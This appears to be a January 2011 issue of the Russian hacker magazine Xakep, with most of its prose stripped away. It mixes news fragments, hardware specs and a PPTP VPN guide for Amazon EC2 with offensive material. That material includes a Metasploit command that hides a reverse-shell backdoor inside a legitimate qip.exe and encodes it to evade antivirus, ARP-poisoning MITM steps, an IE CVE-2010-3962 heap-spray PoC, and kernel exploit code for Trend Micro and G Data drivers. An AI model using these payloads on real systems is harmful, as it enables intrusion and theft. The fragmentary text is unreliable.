01 (144) 2011

ICQ
CSRSS
VPN
AMAZON

INTRO

Total Football, Vogue :).
habrahabr.ru/company/xakep/blog/
www.xakep.ru
nikitozz (nikitoz@real.xakep.ru)
vkontakte.ru/club10933209

CONTENT
MegaNews 004
FERRUM 016
PC_ZONE 020; API Monitor; 023; 024; VPN Amazon; 028; Internet Explorer 9; 032
API-; VPN-; 078 JS-, Python; 082; TO-5 2010; 089; 094; 100; OpenSource; 104; CSRSS; 108; GUI; 112; 116
Internet Explorer 9 Beta?; Linux, BSD; Windows 7; Mac OS X
036; Easy-Hack; 040; 046; 050; 054; ICQ; 058; 064; 070; Top5 2010; 134; 074; X-Tools; 140; FAQ UNITED
MALWARE; 143; 076; 144; WWW2; HTTP-; ICQ; TLS
SYN/ACK 120; 124; 128; PCI DSS; Zimbra; Internet Security; FAQ; 8.5; web-
nikitozz (nikitoz@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
Forb (forb@real.xakep.ru)
PC_ZONE, UNITS
step (step@real.xakep.ru)
MALWARE, SYN/ACK
Dr. Klouniz (alexander@real.xakep.ru)
UNIXOID, PSYCHO
Andrushock (andrushock@real.xakep.ru)
DVD
Step (step@real.xakep.ru)
Unix
Ant (antitster@gmail.com)
Security
D1g1 (evdokimovds@gmail.com)
xakep.ru (xa@real.xakep.ru)
ART
PUBLISHING: 115280, 19, 5, 21; tel. +7 (495) 935-7034; fax +7 (495) 545-0906
GAMES & DIGITAL; MAN TV
strekneva@gameland.ru; ashomko@gameland.ru; alekseeva@gameland.ru; kosheleva@gameland.ru
DVD claims: claim@gameland.ru; (495) 545-09-06; (495) 663-82-77; 8-800-200-3-999
101000, 652
Registration 77-11802, 14.02.2002
Lietuvas Rivas
Print run: 130 958
content@gameland.ru
2010

MEGANEWS
X (magazine@real.xakep.ru)

P2P Dead Drop: USB; deaddrops.com; offline :).

Mozilla: Firefox; 86% Google.

KINECT: Microsoft, Project Natal, Kinect; 2010; Adafruit Industries; Xbox, USB; RGB; $1000 (Kinect $150); GitHub; OpenKinect (www.openkinect.org); MIT, Kinect, iRobot Create, KinectBot, 3D; YouTube.
X 01 (144) 2011

FACEBOOK: Facebook; 500; eBay; Facebook Mail, $500-700; SMS; @facebook.com; Office Web Apps: Facebook mail, Microsoft Word, Excel, PowerPoint; "more fun"; GMail (Google), HotMail (Microsoft); fb.com (American Farm Bureau) :).

Google, Android, 350: firmware; IMEI.

ANDROID: Android; Black Hat; Intel; HTC; proof-of-concept, Google Market (Angry Birds); Alert Logic (WebKit); www.exploit-db.com/exploits/15423; Android 2.2, 36%; Android OS; Google; Google Market.

GOOGLE MAPS: Google Maps; 2007; GPS; Wikipedia.

Skype: 22; 25; 560.

RIAA: Facebook; RIAA; The Pirate Bay, Torrentz, Demonoid; Rapidshare.

ZEUS: ZeuS; MDAC, Adobe Reader, Windows Help Center, Java.

Domains: 11; 240; ~90; 49.5%; 294.000; Ru-Center; 19; 14.

glassdoor.com, IT, Software Engineer: Facebook $110 500 ($11 900); Cisco $105 720 ($8 529); Yahoo $101 638 ($6 197); Apple, Microsoft, Google; $99 127; Google $98 814 ($21 364); Microsoft; CEO Google; 20 000; 10%; $1000; Google, Facebook.

AVK.Dumx.A Trojan: $300 000; SMS; IT.

W3Techs: PHP 74.9%, ASP.NET 23.8%, Java 3.9%.

AMD, Czernobyl: AMD (Athlon XP), x86; www.woodmann.com.

E-Ink: E Ink Triton; 4096 colours, 16 grayscale; 20%, Pearl; Kindle, Kindle DX; Hanvon Technology, 80%; 9.68" (800x600), Wi-Fi, 3G, $440; E Ink, LG Display.

Google, Tier 1: 2010, 5%; 6.4%; Google 80%.

IPHONE: $40 000; 17; iPhone 4; Apple; Foxconn; $130; Home; $279; $169; www.whiteiphone4now.com.

Group-IB: 20%; $1.

ICQ: AOL; ICQ; Digital Sky Technologies (DST), Mail.ru Group, $187.5 million; Mail.ru; Nimbuzz; OSCAR (ICQ); QIP, R&Q, Miranda IM; Mail.ru Group, ICQ, Mail.Ru; SMS; 666 ICQ; Jabber.

Windows 8: 2012; Microsoft.

$28. NFC (Near Field Communication): BlingTag (RFID); PayPal; SMS; Bling Nation; $100; 49; eBay, PayPal; BlingTag, 20 000; Bling Nation; BlingTag.

Logitech K750: 8; 2.4 GHz; AES 128-bit (Logitech Unifying); $80 :).

Google, Chrome: YouTube, Orkut, Blogger, Google Docs, Gmail; $500, $3133.7.

Cyborg R.A.T.9 (Mad Catz): R.A.T.; 25, 5600, 25; 2.4 GHz (1 ms); 1000; 6; 9, 4; 5; $150.

SSD ZALMAN: Zalman; S-Series, N-Series; SandForce; S-Series, JMicron; 2.5", SATA 3.0 Gbps, TRIM, Windows 7; S: 32, 64, 128 GB, 260 MB/s; 60 MB/s, 120 MB/s, 210 MB/s; N: 64, 128 GB, 280/270 MB/s; 32 GB S-Series $99.99; N-Series $289.99.

$100 000, Microsoft: Plants vs. Zombies, Windows Phone 7.

MACBOOK AIR: Apple, MacBook Air; 2; 0.28, 1.7; 13.3" (1440x900), 11.6" (1366x768); 13.3": Intel Core 2 Duo 1.86 GHz, 2 GB, 128/256 GB, NVIDIA GeForce 320M, 256 MB DDR3 SDRAM; 11": Intel Core 2 Duo 1.4 GHz, 2 GB, 64/128 GB; 4 GB; Multi-Touch, FaceTime; AirPort Extreme Wi-Fi (802.11n), Bluetooth 2.1 + EDR; 11.6": $999; 13.3" MacBook Air: $1299; Apple; 11".

FERRUM

SAMSUNG SCX-4600
Print speed, ppm: 22
: 10
Print resolution, dpi: 1200x1200
Copy speed, ppm: 22
Copy resolution, dpi: 1200x1200
Paper tray, sheets: 250
Memory, MB: 64
: 360
Dimensions, mm: 416x409x275.8
Weight, kg: 10.69
Price: 6500 rub.

Samsung SCX-4600; AnyPrint; 10 pages: 38 s, 9 s.

FERRUM

CANYON CNR-WCAM820
CREATIVE LIVE!CAM OPTIA AF
GENIUS ISLIM 2020AF
LOGITECH C600
LOGITECH QUICKCAM SPHERE
MICROSOFT LIFECAM VX-5500

Canyon CNR-WCAM820 (1200 rub.)
Sensor, MP: 2.0
Interpolated, MP: 5.3
Frame rate, fps: 30
USB.

Creative Live!Cam Optia AF (2900 rub.)
Sensor, MP: 2.0
Interpolated, MP: 7.7
Frame rate, fps: 30
F/2.9; YouTube.

3100 rub.; 1700 rub.

Genius iSlim 2020AF
Sensor, MP: 2.0
Interpolated, MP: 8.5
Frame rate: 1.3 MP at 9 fps, 2 MP at 6 fps

Logitech C600
Sensor, MP: 2.0
Interpolated, MP: 8.0
Frame rate, fps: 30

6000 rub.; 2200 rub.

Logitech QuickCam Sphere
Sensor, MP: 2.0
Interpolated, MP: 8.0
Frame rate, fps: 30

Microsoft LifeCam VX-5500
Sensor, MP: 0.3
Interpolated, MP: 1.3
Frame rate, fps: 30

PC_ZONE
oxdef.info

API Monitor

API; Windows; DLL; RegMon, FileMon; API Monitor; API, COM.

API Monitor?
Version 1.5, 2001.

Summary: API, DLL. 10 000 API functions, 166 DLLs, 700, 600 COM (Shell, Browser, DirectShow, DirectSound, DirectX, ...). MSDN. API Capture Filter; GUID, IID, REFIID; MSDN.

API Monitor: CreateFileW, dwShareMode = 1; Parameters -> Decode Parameter Values: "FILE_SHARE_READ | FILE_SHARE_WRITE". ReadFile: lpBuffer, lpNumberOfBytesRead (Hex Buffer). Summary; Call Stack. GetLastError, CommDlgExtendedError, WSAGetLastError; NTSTATUS, HRESULT. Notepad, CreateFile, API Monitor.

Firefox; 5. API Monitor: 64-bit; 32-bit, 64-bit; 32-bit, 64-bit Windows, 32-bit API Monitor.

hook: API Monitor; CreateFileA, CreateFileW, NtCreateFile; API Capture Filter; Ctrl-F (Edit -> Find).

DVD: dvd.

WinApiOverride: API; kerberos; WinAPI; *.rep.
APISpy32: WinAPI.

GMail.

CreateFile: API Monitor; Running Processes; File -> Hook Process; Windows, notepad.exe; Summary, Notepad; CreateFileW, kernel32.dll, NtCreateFile; NtCreateFile: STATUS_OBJECT_NOT_FOUND; kernel32.dll, Notepad: INVALID_HANDLE_VALUE, 2 = ERROR_FILE_NOT_FOUND; API Monitor; NtCreateFile: STATUS_SUCCESS.

SSL: API Monitor; SSL. Internet Explorer:
1. SSL; Gmail.
2. Windows Internet (WinINet); API Monitor.
3. Running Processes, Internet Explorer (Hook).
4. GMail; Google, SSL.
5. API Monitor, HttpSendRequestW; lpOptional (Post-Call Value); Hex Buffer; Internet Explorer; ASCII.
Firefox: Windows Internet; Netscape Portable Runtime (NSPR), Mozilla, SSL; API Monitor; PR_Write; Summary, PR_Write, xul.dll; POST; buf; POST /accounts/ServiceLoginAuth (Hex Buffer); Pre-Call Value; API Monitor; Tools -> Options -> Maximum size of captured buffers.

API Monitor. DLL; XML.

PC_ZONE
Step twitter.com/stepah

+2; 22", 24"; 6, 8. Google Docs; DropBox.

Synergy+ (www.synergy-foss.org): Windows, Linux, Mac OS X; Synergy; GUI.

Server:
1. Share this computer's keyboard and mouse (server).
2. Configure.
3. Screens: +, Screen Name (!).
4.
5. Test; Start.
Client:
1. Use another computer's shared keyboard and mouse (client).
2. Other Computer's Host Name.
3. Test; Start.
Synergy, Ubuntu, Mac OS X: GUI.

PC_ZONE
Step twitter.com/stepah

VPN Amazon

VPN; Amazon; VPN.

Cloud computing; Amazon S3; Amazon Web Services (AWS).

Amazon Web Services

Amazon: Amazon Elastic Compute Cloud (EC2), Amazon Elastic Block Store (EBS), Amazon Simple Storage Service (S3).

Cloud computing; EC2; Instance; root: SSH (Linux), RDP (Windows). Amazon EBS.

AWS: 25; Volume. S3: 10; 1; 5000; 5. AWS Free Usage Tier: 750 hours EC2, 10 GB EBS (Ubuntu), 5 GB S3; Amazon.

VPN!

Ubuntu

Amazon; AWS (aws.amazon.com), Sign up Now; I am a new user; Amazon $1-2; Visa, MasterCard; Qiwi; Amazon (EC2, EBS, S3, ...); 4-digit PIN; EC2, S3: Access Key ID, Secret Access Key.

DVD: dvd; AWS.

EC2: AWS; Elasticfox, Firefox; AWS Access Key, AWS Secret Access Key; Amazon (s3.amazonaws.com/ec2-downloads/ec2-api-tools.zip), EC2; Java Runtime Environment.

Instance: Micro (t1.micro); Micro Instance; Amazon.

Amazon EC2: X.509 Certificate; Amazon; AWS (aws.amazon.com/console); EC2.

EC2: 99.95%. Launch Instance. Small Instance (Default): 1.7 GB of memory, 1 EC2 Compute Unit (1 virtual core with 1 EC2 Compute Unit), 160 GB of instance storage, 32-bit platform; $0.10 (Unix), $0.125; $0.10, $0.17. Amazon Micro Instance.

AMI (Amazon Machine Image): Apache, MySQL, Memcached, ...; Amazon; Community AMIs: 6000, Linux, Windows; Ubuntu; 15 EBS, 10; Ubuntu 10.04: ami-c2a255ab, 10; ID; Install.

Instances; State: Running; Public DNS; IP! Elastic IPs; IP. SSH; Security Group; EC2, Ubuntu; SSH; PuTTY; Amazon pem, PuTTY ppk; PuTTYgen (Load private key file), File. SSH:
Session: Host Name = Elastic IP;
Connection -> Data -> Auto-Login: ubuntu;
Connection -> SSH -> Auth: private key;
Session -> Save.
Open.

PPTP

PuTTY, Ubuntu.

VPN, Windows:
sudo /etc/init.d/pptpd restart

SSH. VPN: OpenVPN, PPTP. OpenVPN. PPTP; GRE. Ubuntu, PPTP.

VPN; NAT. /etc/sysctl.conf:
net.ipv4.ip_forward=1

sudo sysctl -p

NAT:
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

sudo aptitude install pptpd

IP. /etc/pptpd.conf:
localip 192.168.242.1
remoteip 192.168.242.2-5

PPTP: 192.168.242.1; 4 clients: 192.168.242.2 to 192.168.242.5. DNS: Amazon (172.16.0.23), Google Public DNS. /etc/ppp/pptpd-options:
ms-dns 8.8.8.8

PPTP (sudo applies only to the command, not to a shell redirection, so the append goes through tee):
echo '<user> pptpd <password> *' | sudo tee -a /etc/ppp/chap-secrets

<user>, <password>. /etc/ppp/chap-secrets; PPTP.

:) /etc/rc.local, before exit 0:
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

VPN; IP; speedtest.net; VPN; Amazon 15; 10 :).

Amazon; EC2.

VPN; Amazon Instance, GPU, CUDA.

PC_ZONE
lenskyi.d@gmail.com

INTERNET EXPLORER 9:
Internet Explorer 9? 15; Internet Explorer 9 :).

Internet Explorer: IE; Microsoft, "Server is too busy" :); favicon; 10; NumRows, HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage; 20-30; Firefox.

Snap, Windows; Windows 7, IE; Internet Explorer; GMail.

Technical Review: Internet Explorer; IE9 Beta; Direct2D, GPU; JavaScript, Chakra. JavaScript; IE8, IE9; JS, DOM (marshaling); Internet Explorer, JS; JavaScript; Chakra; JavaScript, WebKit SunSpider; 17; Internet Explorer 9, Platform Preview 7.

UI. XSS; Internet Explorer; Microsoft SmartScreen; SmartScreen (IE); Internet Explorer; IE, InPrivate.

HTML5, SVG, CSS 3, ECMAScript 5, DOM (HTML5: ][). IE9: HTML, JavaScript, CSS; Internet Explorer; Microsoft, W3; IE9, Acid3: 95/100; 5; SVG, SMIL; HTML5: <video>, <audio> (Silverlight, Flash); IE9; <canvas>, Canvas 2D API; HTML5; <canvas>; IE9, Direct2D, DirectWrite.

DevTools (F12): HTML/CSS; JavaScript; User-Agent; HTTP; Fiddler (www.fiddler2.com/fiddler); JavaScript, Format JavaScript; Internet Explorer!

PC_ZONE
www.insight-it.ru

100; HighLoad++.

= - + ; 100%.

Debian Linux; HTTP: nginx, reverse proxy; PHP; mod_php, Apache; FastCGI; PHP (Facebook: PHP to C, HipHop); XCache; C, MySQL; memcached.

Stats: 99,5; 40; 11; 200; 160/s; 10, 32 nginx (Apache); 30-40; 2; 5; 10; node.js (JavaScript, ][ 08/2010), XMPP aka Jabber; ffmpeg, VLC.

20%; DNS (32 IP); memcached; PHP; Facebook, MySQL; opensource. Hardware: 8-core Intel; 64 GB; 8; RAID.

Agile; Debian; memcached; 1 :); 4; Content Delivery Network; xfs :); C; TopCoder; MySQL; memcached; GPL.

Debian Linux (www.debian.org)
nginx (sysoev.ru/nginx)
PHP (www.php.net) + XCache (xcache.lighttpd.net)
Apache (www.apache.org) + mod_php
memcached (memcached.org)
MySQL (www.mysql.com)
C
node.js (nodejs.org)
XMPP, HAProxy (haproxy.1wt.eu)
xfs (xfs.org)
ffmpeg (ffmpeg.org)

1000-1500; YouTube; Jabber (XMPP); opensource; XMPP; node.js, JavaScript; 60-80, 150; TCP/HTTP, HAProxy; MongoDB; MySQL; 5; node.js (4); MySQL.

XMPP. IFrame: easyXDM, fastXDM. Twitter. openGraph, <title>, alt (YouTube, RuTube, Vimeo, ...).

WARNING

11; 100.


GreenDog agrrrdog@gmail.com

Easy Hack

#1
Task: IPHONE
Solution:
1)
2) Emergency Call
3) ###
4) Call + Power
Lockscreen Bypassed! iOS 4.1; 4.2 :).

Task: EXE
Solution: IExpress; exe; Metasploit (metasploit.com); msfencode; exe (payload); qip.exe.
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.101 R | ./msfencode -t exe -d ~ -x qip.exe -k -o q_bd101.exe -e x86/shikata_ga_nai -c 3

msfpayload: handler address (LHOST); raw output (R). msfencode: encoder (-e x86/shikata_ga_nai), iterations (-c 3); exe output (-t exe); template directory (-d ~); template qip.exe (-x qip.exe); -k keeps the template's own functionality; output q_bd101.exe (-o q_bd101.exe).

:) exe; MSF; -k; 15/42 on virustotal.com; Windows; CRC.

Task: remote_browser
Solution: remote_browser, Ettercap-NG (ettercap.sourceforge.net). ettercap.conf:
1) nano /etc/etter.conf
2) ec_uid, ec_gid:
ec_uid = 0
ec_gid = 0
3) remote_browser:
remote_browser = "firefox http://%host%url"

Ettercap:
1) ettercap: Ettercap G
2) Sniff -> Unified sniffing;
3) Plugins -> Manage the plugins;
4) remote_browser;
5) Start -> Start sniffing
arp-poison:

Task: TCP/IP
Solution: TCP/IP; hping; Wireshark :); Colasoft Packet Builder (colasoft.com/packet_builder).

arp-poison, GTK Ettercap-NG:
1) Hosts -> Scan for hosts
2) Hosts -> Host list -> IP_router -> Add to T1
3) Hosts -> Host list -> IPs -> Add to T2
4) arp-poison: Mitm -> Arp poisoning -> Sniff remote connection

pcap, tcpreplay:
tcpreplay -i eth0 blah_blah.pcap

Windows; Ettercap-NG. Windows; Ethernet, ARP, IP, TCP, UDP :).

TCP/IP

Wireshark; Colasoft Packet Builder, cap; Wireshark, pcap; cap to pcap. TCP; Colasoft Packet Player; tcpreplay.

Task: TCPDUMP
Solution: and, or; tcp portrange 1-1024; tcp.
tcpdump -w test.pcap -s 1550 net 192.168 and not arp

tcpdump; WireShark, Capture Filter.
tcpdump -w test.pcap -i eth0 host 192.168.0.101 and tcp portrange 1-1024

-i eth0: capture interface;
-w test.pcap: write packets to a file;
host 192.168.0.101: source or destination 192.168.0.101;
-s 1550: snap length (tcpdump default: 96);
net 192.168: source or destination in 192.168;
not arp: exclude ARP.

tcpdump -w test.pcap src 192.168.0.101 and \( tcp port 31337 or udp port \( 4523 or 5543 \) \)

Source 192.168.0.101; TCP port 31337; UDP ports 4523, 5543. IP, MAC; OR, AND, NOT; ||, &&, !. Don't Fragment (IP); SYN (TCP) :).

Task: NMAP
Solution: idle scan, Nmap (nmap.org); Antirez, 1998; IP ID (IPID); TCP SYN; SYN-ACK; RST; IPID. nmap.org/book/idlescan.html. IPID. Nmap (-v): IP ID Sequence Generation: Incremental. NSE (nmap.org/nsedoc/scripts/ipidseq.html).
nmap -v 192.168.0.105

192.168.0.105, IP ID. Idle scan:
nmap -sI 192.168.0.105 -PN -v 192.168.0.1

-sI 192.168.0.105: zombie host;
-PN: no ping (host discovery skipped);
-v: verbose;
192.168.0.1: target.

Idle scan, Nmap, Wireshark. IP; IDS.

Task: wordlist
Solution: l517 (code.google.com/p/l517). Windows.


(CISS Research Team, http://twitter.com/NTarakanov)

01

PROFTPD

FTP, Proftpd. ZDI (Zero Day Initiative), 40; 2! Phrack 67.

TARGETS

Proftpd version < 1.3.3c released.

bugs.proftpd.org/show_bug.cgi?id=3521;
bugs.proftpd.org/show_bug.cgi?id=3519;
xorl.wordpress.com/2010/11/15/cve-2010-4221-proftpd-telnet_iacremote-stack-overflow/.

BRIEF

pr_netio_telnet_gets(), src/netio.c: Telnet IAC (Interpret As Command) escape; FTP, FTPS. mod_site_misc.

EXPLOIT

pr_netio_telnet_gets(), src/netio.c:

char *pr_netio_telnet_gets(char *buf, size_t buflen,
    pr_netio_stream_t *in_nstrm,
    pr_netio_stream_t *out_nstrm)
{
  char *bp = buf;
  unsigned char cp;
  int toread, handle_iac = TRUE, saw_newline = FALSE;
  pr_buffer_t *pbuf = NULL;

  if (buflen == 0) {
    errno = EINVAL;
    return NULL;
  }
  ...
  buflen--;
  if (in_nstrm->strm_buf)
    pbuf = in_nstrm->strm_buf;
  else
    pbuf = netio_buffer_alloc(in_nstrm);

  while (buflen) {
    ...
    while (buflen && toread > 0 &&
           *pbuf->current != '\n' && toread--) {
      cp = *pbuf->current++;
      pbuf->remaining++;
      ...
        default:
          *bp++ = TELNET_IAC;
          buflen--;                    <-----
          telnet_mode = 0;
          break;
      }
      ...
      *bp++ = cp;
      buflen--;                        <-----
    }
    ...
  }
  properly_terminated_prev_command = TRUE;
  *bp = '\0';
  return buf;
}

buflen; TELNET_IAC, buflen - 1; buflen! Integer overflow (size_t underflow of buflen), buffer overflow. Kingcope: exploit-db.com/exploits/15449: FreeBSD; Linux: Debian, SUSE, CentOS. Debian Squeeze: ROP, pool buffer (cmd_rec res, pr_cmd_read); Ubuntu: ROP, RWX, stub. Linux (stack smashing protection)! Cookie; Ubuntu, 24, 100%.

SOLUTION

proftpd-1.3.3c: buflen :).
src/netio.c
.........
+/* In the situation where the previous byte was an IAC,
we wrote IAC into the output buffer, and decremented


buflen (size of the output buffer remaining). Thus we
+ need to check here if buflen is zero, before trying to
decrement buflen again (and possibly underflowing the
buflen size_t data type).
+ */
+
if (buflen == 0) {
+
break;
+
}
*bp++ = cp;
buflen--;
.........
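Review bot: the new guard `if (buflen == 0) { break; }` placed directly before `*bp++ = cp;` / `buflen--;` is the right fix for the size_t underflow: the IAC branch above has already written TELNET_IAC and decremented buflen once, so without this check the second `buflen--` on a zero value wraps to SIZE_MAX and the outer `while (buflen)` keeps copying past the caller's buffer. Worth stating in the commit text that the check must live inside the inner loop body, since the inner loop's `buflen &&` condition is only evaluated at the top of each iteration and cannot catch a decrement that happens mid-body.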

02

INTERNET EXPLORER (CVE-2010-3962)

TARGETS:

Internet Explorer 6/7/8

BRIEF

Websense Security Labs; IE.

object[0], 0x30; SetUserClip. CSS. PoC:
<html>
<table style=position:absolute;clip:rect(0)>
</html>

mshtml!CLayout::EnsureDispNodeBackground+0x81:
7dcb1c2d  xor   esi,esi
7dcb1c2f  inc   esi
7dcb1c30  push  esi
7dcb1c31  mov   ecx,edi
7dcb1c33  call  mshtml!CDispNode::SetBackground (7dcafe4b)
7dcb1c38  mov   eax,dword ptr [edi]     ; <--
7dcb1c3a  mov   ecx,edi
7dcb1c3c  call  dword ptr [eax+30h]     ; <--

mshtml!CDispNode::SetUserClip+0x84:
7dd8b5d0  call  mshtml!CRect::RestrictRange (7dd89389)
7dd8b5d5  mov   eax,dword ptr [edi+4]
7dd8b5d8  and   eax,esi
7dd8b5da  movzx ecx,byte ptr mshtml!CDispNode::_extraSizeTable (7dc31c10)[eax]
7dd8b5e1  mov   eax,edi
7dd8b5e3  shl   ecx,2
7dd8b5e6  sub   eax,ecx
7dd8b5e8  or    dword ptr [eax],1       ;<-- eax

heap-spray; DEP/ASLR. PoC:
<html>
<head><title>poc CVE-2010-3962 zeroday</title>
<script>
function alloc(bytes, mystr) {
  var shellcode = unescape(' :) ');
  while (mystr.length < bytes) mystr += mystr;
  return mystr.substr(0, (bytes-6)/2) + shellcode;
}
</script>
</head>
<body>
<script>
alert('ph33r: click me');
var evil = new Array();
var FAKEOBJ = unescape("%u0d0d%u0d0d");
FAKEOBJ = alloc(1294464, FAKEOBJ);
for (var k = 0; k < 1000; k++) {
  evil[k] = FAKEOBJ.substr(0, FAKEOBJ.length);
}
document.write("<table style=position:absolute;clip:rect(0)>");
</script>
</body>
</html>

exploit-db.com/exploits/15376.

SOLUTION

Workaround (MS):
1. KB2458511.CSS:
TABLE
{
POSI\TION: relative !important;
}

2. Export the key:
regedit /e CSS-backup.reg "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Styles"

3. Apply_user_CSS.reg:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Styles]
"User Stylesheet"="C:\\[directory location]\\KB2458511.css"
"Use My Stylesheet"=dword:00000001

[directory location]: KB2458511.css.

CSS
4. :).

03

TREND MICRO

TARGETS:
Titanium Maximum Security
Titanium Internet Security

BRIEF

DeviceIoControl, IoctlCode 0x220404. Ioctl, \\.\tmtdi:
.text:0001DB7B loc_1DB7B:
.text:0001DB7B     test    dword_2289C, 10000000h
.text:0001DB85     mov     edi, [ebx+0Ch]          ; edi
.text:0001DB88     jz      short loc_1DB95
.text:0001DB8A     push    offset aIoctrl_bind_cf  ; "[IOCTRL_BIND_CFW]\n"
.text:0001DB8F     call    DbgPrint
.text:0001DB94     pop     ecx
.text:0001DB95     push    edi                     ; VirtualAddress
.text:0001DB96     call    esi                     ; MmIsAddressValid
.text:0001DB98     test    al, al
.text:0001DB9A     jz      loc_1DD19

NULL; sub_10CD4; PageFault. dword_228B4, NULL; jmp ecx.

success
.text:0001DBA0     cmp     [ebp+DeviceObject], 8   ;
.text:0001DBA4     jb      loc_1DD19
.text:0001DBAA     mov     eax, [edi]              ; eax, 4
.text:0001DBAC     mov     dword_228B4, eax        ;

x-refs, dword_228B4; winsock bind; jmp ecx!
.text:00010CD4 sub_10CD4 proc near
.text:00010CD4     mov     edi, edi
.text:00010CD6     push    ebp
.text:00010CD7     mov     ebp, esp
.text:00010CD9     mov     ecx, dword_228B4        ; ecx
.text:00010CDF     xor     eax, eax
.text:00010CE1     test    ecx, ecx
.text:00010CE3     jz      short loc_10CE8         ; NULL
.text:00010CE5     pop     ebp
.text:00010CE6     jmp     ecx                     ; !!!
.text:00010CE8 ; -----------------------------------
.text:00010CE8 loc_10CE8:
.text:00010C E8     pop     ebp
.text:00010CE9     retn    4
.text:00010CE9 sub_10CD4 endp

EXPLOIT

DeviceIoControl, bind:
in = 0x10, out = 0x0C;
*inbuff = ring0_shellcode_address;
DeviceIoControl(hDevice,
                ioctl,
                (LPVOID)inbuff,
                in,
                (LPVOID)inbuff,
                out,
                &len,
                NULL);
bind(ListenSocket, (SOCKADDR*) &service, sizeof(service)); // !

dword_228B4:
DWORD WINAPI ResetPointer(LPVOID lpParam) {
  HANDLE hDevice;
  DWORD *inbuff;
  DWORD ioctl = 0x220404, in = 0x10, out = 0x0C, len;
  DWORD interval = 500; // !
  Sleep(interval);
  inbuff = (DWORD *)malloc(0x1000);
  if (!inbuff) {
    printf("malloc failed!\n");
    return 0;
  }
  *inbuff = 0;
  hDevice = (HANDLE)lpParam;
  DeviceIoControl(hDevice,
                  ioctl,
                  (LPVOID)inbuff,
                  in,
                  (LPVOID)inbuff,
                  out,
                  &len,
                  NULL);
  free(inbuff);
  return 0;
}

SOLUTION

Trend Micro :).

04

G DATA

TARGETS:

G Data TotalCare 2011

BRIEF

1. Race Condition, Native API
2. Ioctl
Ioctl, MiniIcptControlDevice0. Ioctl 0x83170180:
.text:00010DBC     cmp     edx, 83170180h          ;<-----
.text:00010DC2     jz      loc_10EAD
[..]
.text:00010EC0     push    eax                     ; <------ eax, 4
.text:00010EC1     call    FltReleaseContext       ;

DoFreeContext, FLT_CONTEXT. svchost.exe. WDK. FLT_CONTEXT. Step, Windbg; DoFreeContext: FltReleaseContext -> DoReleaseContext -> DoFreeContext.

.text:00011F04 ; int __stdcall DoFreeContext(PVOID Entry)
.text:00011F04 _DoFreeContext@4 proc near
.text:00011F04
.text:00011F04 Entry = dword ptr 8
.text:00011F04
.text:00011F04     mov     edi, edi
.text:00011F06     push    ebp
.text:00011F07     mov     ebp, esp
.text:00011F09     push    esi
.text:00011F0A     push    edi
.text:00011F0B     mov     edi, [ebp+Entry]
.text:00011F0E     mov     esi, [edi]              ; <----- edi
.text:00011F10     mov     eax, [esi+4]
.text:00011F13     test    eax, eax                ;<---- NULL
.text:00011F15     jz      short loc_11F24
.text:00011F17     xor     ecx, ecx
.text:00011F19     mov     cx, [esi+0Ch]
.text:00011F1D     push    ecx
.text:00011F1E     lea     ecx, [edi+28h]
.text:00011F21     push    ecx
.text:00011F22     call    eax                     ; <-----

.text:00012066 ; int __stdcall DoReleaseContext(PVOID Entry)
.text:00012066 _DoReleaseContext@4 proc near
.text:00012066
.text:00012066 Entry = dword ptr 8
.text:00012066
.text:00012066     mov     edi, edi
.text:00012068     push    ebp
.text:00012069     mov     ebp, esp
.text:0001206B     push    esi
.text:0001206C     mov     esi, [ebp+Entry]
.text:0001206F     lea     eax, [esi+24h]
.text:00012072     or      ecx, 0FFFFFFFFh         ; <---- ecx = -1
.text:00012075     lock xadd [eax], ecx            ; <----
.text:00012079     jnz     short loc_120A6
.text:0001207B     call    ds:__imp__KeGetCurrentIrql@0 ; KeGetCurrentIrql()
.text:00012081     cmp     al, 2
.text:00012083     jnb     short loc_1208D
.text:00012085     push    esi                     ; <---- esi
.text:00012086     call    _DoFreeContext@4        ; DoFreeContext(x)

EXPLOIT

FLT_CONTEXT, 4, DeviceIoControl:
void craft_fake_flt_context(
    char* buff,
    LPVOID shellcode_addr)
{
  DWORD references = 1;
  DWORD *Entry;
  Entry = (DWORD*)malloc(0x8);
  Entry[0] = Entry;          //Entry[0] == esi
  Entry[1] = shellcode_addr; //[esi+4] r0 shellcode
  memcpy(buff-0x4, &references, 0x4);
  memcpy(buff-0x28, Entry, 0x4);
}
...
craft_fake_flt_context(inbuffer, zpage);
buff[0] = inbuffer;
DeviceIoControl(
    hDevice,
    ioctl,
    buff,
    in,
    buff,
    out,
    &len,
    NULL);

SOLUTION

:)


DX http://kaimi.ru

SQL, XSS. 272, 273. IT; http://kaimi.ru/quest. SQL; HTML. 600, 21. help!

#0 (dx): ans.

#1 (Kaimi): Google. 2.

#2 (Kaimi): 16. ans. Tineye.com! Babylon.

base64; PHP; ROM; Hexposure.

#3 (Kaimi): PHP; dx :). base64, eval, print. if; true; php, <?php ?>!

#4 (Kaimi): PHP, 4. ROM, Dendy, Kaimi. Kaimi, ROM! Hex ("" <-> ""). Hexposure. ROM, Nesticle. Table:
80=0
81=1
8A=A
...

tbl. ROM, Hexposure. ROM :).

Perl; XOR BY 0X03; XOR. PHP:
<?php
$string = ' ';
for ($i = 0, $len = strlen($string); $i < $len; $i++)
    print chr(ord($string[$i]) ^ 0x03);
?>

#5 (Kaimi): Perl. eval, print. lame. "369Y9RLj73YWTiX4W7D7460Wxj1Kkp4b6f7A4mbTWmw5sfnAnmHEZUA3VndW" ^ "CDP7Mrn6Yp631SxV6M-YSWl9ZJX-CTu0q0lqiMDrwI6g405q3M4zr1D8IMl"; XOR. print; pl: print "\nCode: bazinga\n" if($ARGV[0] && $ARGV[0] eq 'pwn'). bazinga.

#6 (dx): 1000.

#7 (dx): C++:
#include "windows.h"
void main()
{
    DWORD ans = 0;
    char pass[] = {'T', 'r', 'o', 'l', 'o', 'l', 'o', 0};
    int (*lol)(const char*, ...) = printf;
    /* printf is called through a function pointer; there is no
       explicit #include "stdio.h", it arrives via #include "windows.h" */
    for (char * i = pass; *i != 0; *i ^= *(i+++1));
    for (size_t i = 0; i < 8; ans += pass[i++]);
    // i = 0
    lol("%X\r\n", ans *= 2);
}

17C.

#8 (Kaimi): SWF. Media Player Classic. flash; Sothink SWF Decompiler; 28.
